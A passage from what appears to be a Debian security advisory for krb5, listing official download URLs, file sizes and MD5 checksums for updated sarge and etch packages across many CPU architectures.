916ea871ff1977c2293a56d79dc4e840\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.3.6-2sarge4_mipsel.deb\n Size/MD5 checksum: 146468 4352c5843806234a3736827084ba12e6\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.3.6-2sarge4_mipsel.deb\n Size/MD5 checksum: 165420 e8841b6a943bb8a2dc50d3a12f08b097\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.3.6-2sarge4_mipsel.deb\n Size/MD5 checksum: 682572 8c4f8624982d503b058096e4e6ae7732\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.3.6-2sarge4_mipsel.deb\n Size/MD5 checksum: 354934 966ebdd40dd7f25e940f5f365bb8de1d\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.3.6-2sarge4_powerpc.deb\n Size/MD5 checksum: 104928 6c5055b15dc847aede18f1896766226b\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.3.6-2sarge4_powerpc.deb\n Size/MD5 checksum: 217626 e50b4eab8968309b0e2dc9c6fa536ea4\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.3.6-2sarge4_powerpc.deb\n Size/MD5 checksum: 56816 3bd00f6e9313eb2dc1bae0cb72c31374\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.3.6-2sarge4_powerpc.deb\n Size/MD5 checksum: 126050 b3daca5ae9279e9963ff34b7a8fc7270\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.3.6-2sarge4_powerpc.deb\n Size/MD5 checksum: 82508 b9ff1fc4d5224d60f586b33064e19abe\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.3.6-2sarge4_powerpc.deb\n Size/MD5 checksum: 61544 2dc54082294e8b2d49d576e44ecde30c\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.3.6-2sarge4_powerpc.deb\n Size/MD5 checksum: 143612 e63a590b4b19bb4d44f8ddf5b514ef3a\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.3.6-2sarge4_powerpc.deb\n Size/MD5 checksum: 165530 03b169581afdb74b8cb6bc925bc12772\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.3.6-2sarge4_powerpc.deb\n Size/MD5 checksum: 634694 b2f19d9a57a559ef0db1f04d88a00663\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.3.6-2sarge4_powerpc.deb\n Size/MD5 checksum: 352904 550389ef5277b0b5c9cc76516d000603\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.3.6-2sarge4_s390.deb\n Size/MD5 checksum: 99046 9c7e32c8053aa12e89da6175316a29e1\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.3.6-2sarge4_s390.deb\n Size/MD5 checksum: 213978 0fba5ba506e53561e622d85640e9de08\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.3.6-2sarge4_s390.deb\n Size/MD5 checksum: 57014 6c07850bfe519001f333bbf3593c9e69\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.3.6-2sarge4_s390.deb\n Size/MD5 checksum: 121124 171d72893437cfdc361566d95185339a\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.3.6-2sarge4_s390.deb\n Size/MD5 checksum: 82164 b4b307da992d6ac9a7db82b842c7a29a\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.3.6-2sarge4_s390.deb\n Size/MD5 checksum: 63222 2c820c0093d341f2849e3ccd2dc47576\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.3.6-2sarge4_s390.deb\n Size/MD5 checksum: 132766 54039c0ea9d55b92252729b63a9e9c5f\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.3.6-2sarge4_s390.deb\n Size/MD5 checksum: 180106 d990b1ca5fb8ad1c695974fc1f2960b9\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.3.6-2sarge4_s390.deb\n Size/MD5 checksum: 624734 c4a3211cf0cccef1b64bddc37d8d03f3\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.3.6-2sarge4_s390.deb\n Size/MD5 checksum: 375998 d0817187f39c10e0ae6239768068fda6\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.3.6-2sarge4_sparc.deb\n Size/MD5 checksum: 92926 a69edce76b66c847fa1295ed3986ebc5\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.3.6-2sarge4_sparc.deb\n Size/MD5 checksum: 194366 1d1a6b64426a5fe99fff161ff7f45b67\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.3.6-2sarge4_sparc.deb\n Size/MD5 checksum: 53320 eadc63db311ad74434d9d1e582edc388\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.3.6-2sarge4_sparc.deb\n Size/MD5 checksum: 113856 3b8b455d4cac9e71893f3a3d429dc347\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.3.6-2sarge4_sparc.deb\n Size/MD5 checksum: 73390 6fabe55417081013b42c31a475be0c03\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.3.6-2sarge4_sparc.deb\n Size/MD5 checksum: 58736 bbf17fb90fbca031e0bd7b2c7d4f4fdf\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.3.6-2sarge4_sparc.deb\n Size/MD5 checksum: 126594 7dbabf5abc87ea97ce29b37158902bea\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.3.6-2sarge4_sparc.deb\n Size/MD5 checksum: 157510 314ec42c3b66b79074527b4ff111f403\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.3.6-2sarge4_sparc.deb\n Size/MD5 checksum: 576572 4773adc277321c64db8ef503905337cb\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.3.6-2sarge4_sparc.deb\n Size/MD5 checksum: 330226 1bda02fff2bd85f3dc5b77e6f045b12e\n\n\nDebian GNU/Linux 4.0 alias etch\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5_1.4.4-7etch1.dsc\n Size/MD5 checksum: 876 3c812c5bbd93a01103c67c50a15646be\n http://security.debian.org/pool/updates/main/k/krb5/krb5_1.4.4-7etch1.diff.gz\n Size/MD5 checksum: 1585246 993d66c078ac0a5f6e29155c6973ee0a\n http://security.debian.org/pool/updates/main/k/krb5/krb5_1.4.4.orig.tar.gz\n Size/MD5 checksum: 11017910 a675e5953bb8a29b5c6eb6f4ab0bb32a\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-doc_1.4.4-7etch1_all.deb\n Size/MD5 checksum: 1811728 4b98ff8f04581e869209f96768c26ef5\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.4.4-7etch1_alpha.deb\n Size/MD5 checksum: 88434 5ca7ba02beb2fddcbfbf9f84048ca219\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.4.4-7etch1_alpha.deb\n Size/MD5 checksum: 245190 81df69467cc00c96a924de8b849f8ec5\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.4.4-7etch1_alpha.deb\n Size/MD5 checksum: 65626 1a2a5981bc6cf2310a9dc71fdce6e180\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.4.4-7etch1_alpha.deb\n Size/MD5 checksum: 155128 397434d0489f812409ee8d4534fe2141\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.4.4-7etch1_alpha.deb\n Size/MD5 checksum: 91628 dacab2ab92c1e26132bfcb35935eec28\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.4.4-7etch1_alpha.deb\n Size/MD5 checksum: 75554 d2880217331bbe61397d3b5dd045bb13\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.4.4-7etch1_alpha.deb\n Size/MD5 checksum: 136114 828e00845fc669e7825cef58c9cec6dd\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.4.4-7etch1_alpha.deb\n Size/MD5 checksum: 215514 bc0a173bdce02376480f427158aadf16\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dbg_1.4.4-7etch1_alpha.deb\n Size/MD5 checksum: 1087954 f08cf12afeb09b686664ba4bbdbc6e6f\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.4.4-7etch1_alpha.deb\n Size/MD5 checksum: 1016210 2d6aa3be0378d47c3bdfd4890528b9bc\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.4.4-7etch1_alpha.deb\n Size/MD5 checksum: 460824 ee08102f7307b3b152a25d8e5e8834de\n\n AMD64 architecture:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.4.4-7etch1_amd64.deb\n Size/MD5 checksum: 83232 d50f8cbf4cf16b0c4bf20829b98eb7ed\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.4.4-7etch1_amd64.deb\n Size/MD5 checksum: 221464 897e368902360004511bd0ace9294b6b\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.4.4-7etch1_amd64.deb\n Size/MD5 checksum: 61692 f5710c9fba60636c96c08a8b3af2045b\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.4.4-7etch1_amd64.deb\n Size/MD5 checksum: 141842 b591951657a5de1cff50b2ce3cb037ef\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.4.4-7etch1_amd64.deb\n Size/MD5 checksum: 86268 55e365893b4a6b890dcb6d2a701d92c0\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.4.4-7etch1_amd64.deb\n Size/MD5 checksum: 67792 b8d3d3cce462df24c2b2d36293bff5b0\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.4.4-7etch1_amd64.deb\n Size/MD5 checksum: 130876 634099f9ec167301dbe7d55be7882b30\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.4.4-7etch1_amd64.deb\n Size/MD5 checksum: 190056 83c6b167a3fa6d5af25b981e9ad47418\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dbg_1.4.4-7etch1_amd64.deb\n Size/MD5 checksum: 1070450 42fb6e4373b61a8fd0e744a2ea9d0b5a\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.4.4-7etch1_amd64.deb\n Size/MD5 checksum: 766758 2fbf76c7d63c88839fdc71501dc21107\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.4.4-7etch1_amd64.deb\n Size/MD5 checksum: 426686 424b59294000ebde26a5251973f5fdf0\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.4.4-7etch1_arm.deb\n Size/MD5 checksum: 78082 9f47347dd2c6c65f52319c97e45ff462\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.4.4-7etch1_arm.deb\n Size/MD5 checksum: 200186 2566c1b226be25441db26c5d312b421d\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.4.4-7etch1_arm.deb\n Size/MD5 checksum: 58856 6fea432a5624a157b1f0a3731e0d173d\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.4.4-7etch1_arm.deb\n Size/MD5 checksum: 135606 4345140a428908b37d6f5273e3ed7da1\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.4.4-7etch1_arm.deb\n Size/MD5 checksum: 80608 4bbb3a3641e44b8bb9a4fc1c5d083102\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.4.4-7etch1_arm.deb\n Size/MD5 checksum: 62926 09c3cc3ea6b9a1499e0e9dfcdecafb05\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.4.4-7etch1_arm.deb\n Size/MD5 checksum: 124706 4e690e5c6c4c7e7da5740b9c0f12af9f\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.4.4-7etch1_arm.deb\n Size/MD5 checksum: 172264 0e1298d461128f9c647c739653326c19\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dbg_1.4.4-7etch1_arm.deb\n Size/MD5 checksum: 1013022 b57238d456f3beaa0d0dbf2b62442a86\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.4.4-7etch1_arm.deb\n Size/MD5 checksum: 681790 fb4d986cd2e8d12fa04b5913ed5a38e2\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.4.4-7etch1_arm.deb\n Size/MD5 checksum: 390064 c0b4815bfbeeb5b4886f2a52b550c158\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.4.4-7etch1_hppa.deb\n Size/MD5 checksum: 85030 0a6fadd801b186eb594ee5fec5f401c4\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.4.4-7etch1_hppa.deb\n Size/MD5 checksum: 233036 6b3f03fe726f0ed08fe54a997fca6012\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.4.4-7etch1_hppa.deb\n Size/MD5 checksum: 63682 f9a4f7714fe441c4ce9ab5b08dcc5446\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.4.4-7etch1_hppa.deb\n Size/MD5 checksum: 145346 b423ae82b93e9192480a237c0ed14c43\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.4.4-7etch1_hppa.deb\n Size/MD5 checksum: 87070 96b79066e9a1c2e91de4783971d25457\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.4.4-7etch1_hppa.deb\n Size/MD5 checksum: 69974 9f95f8d5d61d4b596e0ff740b8a61990\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.4.4-7etch1_hppa.deb\n Size/MD5 checksum: 132890 99be96f336b52ddcadb81ef08422982f\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.4.4-7etch1_hppa.deb\n Size/MD5 checksum: 201956 c78e66940879478a4aeccd3177d60965\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dbg_1.4.4-7etch1_hppa.deb\n Size/MD5 checksum: 1082124 add0f1588ae943d85ec7a2b90a3a1b1d\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.4.4-7etch1_hppa.deb\n Size/MD5 checksum: 815700 0ee7af18e38f9d8eabbef99c03435fbf\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.4.4-7etch1_hppa.deb\n Size/MD5 checksum: 437480 f960e56a29b1eb2061d1bc2ef0134990\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.4.4-7etch1_i386.deb\n Size/MD5 checksum: 78004 076140c9d3df111148f259a0c1aa2d34\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.4.4-7etch1_i386.deb\n Size/MD5 checksum: 196088 40cc5fc641d24fb1cb54d3aba24e51b0\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.4.4-7etch1_i386.deb\n Size/MD5 checksum: 57822 20aabab63e0976d38f0a72e9fa1f42d2\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.4.4-7etch1_i386.deb\n Size/MD5 checksum: 132828 cef966062845545c71f5a6f84e6fdfc4\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.4.4-7etch1_i386.deb\n Size/MD5 checksum: 79888 5bda94c68e5368047ed93665c734ec80\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.4.4-7etch1_i386.deb\n Size/MD5 checksum: 62008 17c4607112e571b22f95aa174502998c\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.4.4-7etch1_i386.deb\n Size/MD5 checksum: 123794 2c0f795975289fdfc4254852ac5fe1c5\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.4.4-7etch1_i386.deb\n Size/MD5 checksum: 173608 a2f67bd332d2bc90732536606fb5af89\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dbg_1.4.4-7etch1_i386.deb\n Size/MD5 checksum: 1037458 35fc79a9574582d3dc70e2e582300fce\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.4.4-7etch1_i386.deb\n Size/MD5 checksum: 679676 24d0bb8fea2a924b395126204448ea34\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.4.4-7etch1_i386.deb\n Size/MD5 checksum: 407958 6173bc1bb4e1ca40b911036ec34488c3\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.4.4-7etch1_ia64.deb\n Size/MD5 checksum: 104552 a5a8255ba3e2b3fc21f11c2844538800\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.4.4-7etch1_ia64.deb\n Size/MD5 checksum: 305498 e3fecfb7741fb3e6058244e6a56b7237\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.4.4-7etch1_ia64.deb\n Size/MD5 checksum: 79880 289c3b2666f36cb3766f3ab8d5391e9c\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.4.4-7etch1_ia64.deb\n Size/MD5 checksum: 190176 1d848b0c7a55d2eecce4d8d0be2dd74b\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.4.4-7etch1_ia64.deb\n Size/MD5 checksum: 112790 81d40d9e2b79f146aa62f26b70dffe14\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.4.4-7etch1_ia64.deb\n Size/MD5 checksum: 90890 b5088c38a3147cf5fdea4d86a83d7526\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.4.4-7etch1_ia64.deb\n Size/MD5 checksum: 164250 cc94e602ea7fb7f781d9c0b4a0953cdd\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.4.4-7etch1_ia64.deb\n Size/MD5 checksum: 269080 4c61477739f1f8cb1906c9d582d4699b\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dbg_1.4.4-7etch1_ia64.deb\n Size/MD5 checksum: 1043550 1361e14de88ea0f06f9f94f2433736e7\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.4.4-7etch1_ia64.deb\n Size/MD5 checksum: 1087968 dde40a86752c0a1d549dd358740b1248\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.4.4-7etch1_ia64.deb\n Size/MD5 checksum: 591780 0a558256583049515c5bbaa3e0015771\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.4.4-7etch1_m68k.deb\n Size/MD5 checksum: 75800 a81baf70fa083dfef189546a571c1054\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.4.4-7etch1_m68k.deb\n Size/MD5 checksum: 185900 47ae833d77d72d094489132a05c062a3\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.4.4-7etch1_m68k.deb\n Size/MD5 checksum: 54810 a47b977cafcd7613cdfe987e60d2a556\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.4.4-7etch1_m68k.deb\n Size/MD5 checksum: 126756 84907221e15e69b91138c5f8c24dfe1a\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.4.4-7etch1_m68k.deb\n Size/MD5 checksum: 76466 3a046bfa740fbfd0bd38bc799170ce9d\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.4.4-7etch1_m68k.deb\n Size/MD5 checksum: 59326 2994d0afb8be81f6948885fdb04b3d8b\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.4.4-7etch1_m68k.deb\n Size/MD5 checksum: 119948 de0adcd99a920f5a96f3e02090f444f8\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.4.4-7etch1_m68k.deb\n Size/MD5 checksum: 161758 d07584193ec131a60b585c19a68f01b7\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dbg_1.4.4-7etch1_m68k.deb\n Size/MD5 checksum: 1041254 f7012755499421834b7f9a5e1bd67f1f\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.4.4-7etch1_m68k.deb\n Size/MD5 checksum: 627120 b545cb956265bf549d0767787bbf934a\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.4.4-7etch1_m68k.deb\n Size/MD5 checksum: 361220 98181efd2e6014f1bf4a58c4d17ed49c\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.4.4-7etch1_mips.deb\n Size/MD5 checksum: 81788 e2f03d1b02e723bced497d6bbd47ee7e\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.4.4-7etch1_mips.deb\n Size/MD5 checksum: 232444 c3334a3c6afbd7bb81af678d4126cb0b\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.4.4-7etch1_mips.deb\n Size/MD5 checksum: 63202 8dfde15398248978789df7ea6f180f46\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.4.4-7etch1_mips.deb\n Size/MD5 checksum: 144670 de9dd221a1a12b06ae9a7b7bc9f5153f\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.4.4-7etch1_mips.deb\n Size/MD5 checksum: 86696 8bc48330d1d8ad77d1ee1ccbf8b02e8d\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.4.4-7etch1_mips.deb\n Size/MD5 checksum: 71486 e4a3f3270f71f0a76d7fdaa9d36331b5\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.4.4-7etch1_mips.deb\n Size/MD5 checksum: 130830 507773b943e7087e56e89fcadb257a1a\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.4.4-7etch1_mips.deb\n Size/MD5 checksum: 176974 d824dbeab78da40c6275af446546dd1b\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dbg_1.4.4-7etch1_mips.deb\n Size/MD5 checksum: 1113114 163bf4a202ac94d5ff7e678b85f14823\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.4.4-7etch1_mips.deb\n Size/MD5 checksum: 807398 200892d4c1cd1a19878806c11a1f4cac\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.4.4-7etch1_mips.deb\n Size/MD5 checksum: 389706 4d44a5b63fdfb59524304a3d611a4096\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.4.4-7etch1_mipsel.deb\n Size/MD5 checksum: 81768 26f7588b5b219c0f56b2efef37bed2a6\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.4.4-7etch1_mipsel.deb\n Size/MD5 checksum: 232318 b719c6f2994d95962e5123684066b8ac\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.4.4-7etch1_mipsel.deb\n Size/MD5 checksum: 63386 3f4cf77845617291c6ea5e6b04ce6d76\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.4.4-7etch1_mipsel.deb\n Size/MD5 checksum: 145438 9c804ffffbcb84b7730b9989e1d925c9\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.4.4-7etch1_mipsel.deb\n Size/MD5 checksum: 87024 a27a367cfc8cdc810a2143c53e16c05b\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.4.4-7etch1_mipsel.deb\n Size/MD5 checksum: 71150 ae1b043223774f7eebb6ed29ab003385\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.4.4-7etch1_mipsel.deb\n Size/MD5 checksum: 130712 768d4504c6613ee3964f24e70713a078\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.4.4-7etch1_mipsel.deb\n Size/MD5 checksum: 178972 af710061d15e4a2f3ea13a676c5d27bf\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dbg_1.4.4-7etch1_mipsel.deb\n Size/MD5 checksum: 1087052 df8b16bdfea146b4d62752b759d9f6a1\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.4.4-7etch1_mipsel.deb\n Size/MD5 checksum: 809872 3067d34aeaba3a5f3fdc231d150aab11\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.4.4-7etch1_mipsel.deb\n Size/MD5 checksum: 391374 f323cf30035d38920e3f347c1e42d9ae\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.4.4-7etch1_powerpc.deb\n Size/MD5 checksum: 83662 0ec431ef213ed44d9f2e0a8c86ea0793\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.4.4-7etch1_powerpc.deb\n Size/MD5 checksum: 222362 0c13e94ab95475f49a0d65f33899721a\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.4.4-7etch1_powerpc.deb\n Size/MD5 checksum: 61506 050e2815aadcd13f01d4dd243c3d501b\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.4.4-7etch1_powerpc.deb\n Size/MD5 checksum: 143496 b9e873e1d6a1c38190619d84a2779015\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.4.4-7etch1_powerpc.deb\n Size/MD5 checksum: 86438 f13f7a761fec58897096c7606ffb3c11\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.4.4-7etch1_powerpc.deb\n Size/MD5 checksum: 66954 15a97efcab1d560d1b436dbbcd0799af\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.4.4-7etch1_powerpc.deb\n Size/MD5 checksum: 136864 77baa09629e3418e25a1b9309faed7f8\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.4.4-7etch1_powerpc.deb\n Size/MD5 checksum: 179070 7c22c5381a6b2ad4450c078475867e45\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dbg_1.4.4-7etch1_powerpc.deb\n Size/MD5 checksum: 1082734 28110be9d998374a13ac90bffdf5d69b\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.4.4-7etch1_powerpc.deb\n Size/MD5 checksum: 752980 eba363ffb3d68112e352a04b03ed4159\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.4.4-7etch1_powerpc.deb\n Size/MD5 checksum: 398944 49c9f53598050ba31f9f7daecdf5fba1\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.4.4-7etch1_s390.deb\n Size/MD5 checksum: 81470 b206121253cf849da5adc883fe2de83d\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.4.4-7etch1_s390.deb\n Size/MD5 checksum: 224016 17c538830bc57f68a80ed4a83a2c17f0\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.4.4-7etch1_s390.deb\n Size/MD5 checksum: 62954 bebdaa3a20790e96bf2f3edfc3a4ab59\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.4.4-7etch1_s390.deb\n Size/MD5 checksum: 139942 e05d45fb378992714002d2fbe3575416\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.4.4-7etch1_s390.deb\n Size/MD5 checksum: 87440 f9fd7fef9c3438c1c7ffab1d3fd3a2c5\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.4.4-7etch1_s390.deb\n Size/MD5 checksum: 68342 c835d99dc1a13916ae406c637bf73631\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.4.4-7etch1_s390.deb\n Size/MD5 checksum: 128864 3e0a54d046c4f64a7a2118a7b7c1fe4a\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.4.4-7etch1_s390.deb\n Size/MD5 checksum: 194966 a5281dc23bea7994f619760348316aba\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dbg_1.4.4-7etch1_s390.deb\n Size/MD5 checksum: 1073124 8ca6062dc9748735d7186c099cf16d2e\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.4.4-7etch1_s390.deb\n Size/MD5 checksum: 732972 fbcdc91f99d841f99d778aa2116697ed\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.4.4-7etch1_s390.deb\n Size/MD5 checksum: 438532 2607ba683fbf8c1b7e6d15dfd583f8ea\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.4.4-7etch1_sparc.deb\n Size/MD5 checksum: 76460 66edc360022f7952d4df9a52818aeead\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.4.4-7etch1_sparc.deb\n Size/MD5 checksum: 199800 b3f30d39d1a4aa7b04b5c5d574255fdb\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.4.4-7etch1_sparc.deb\n Size/MD5 checksum: 57792 b20a483e3733783e50bcf3f129c3c6c4\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.4.4-7etch1_sparc.deb\n Size/MD5 checksum: 131320 5bafed0bdcf638d747e0fa0c11343608\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.4.4-7etch1_sparc.deb\n Size/MD5 checksum: 77778 3531ee2320e1766ad4f955d1e037907b\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.4.4-7etch1_sparc.deb\n Size/MD5 checksum: 63360 78bba2c3b9fae6dfaf7a23ddcd66c28c\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.4.4-7etch1_sparc.deb\n Size/MD5 checksum: 122674 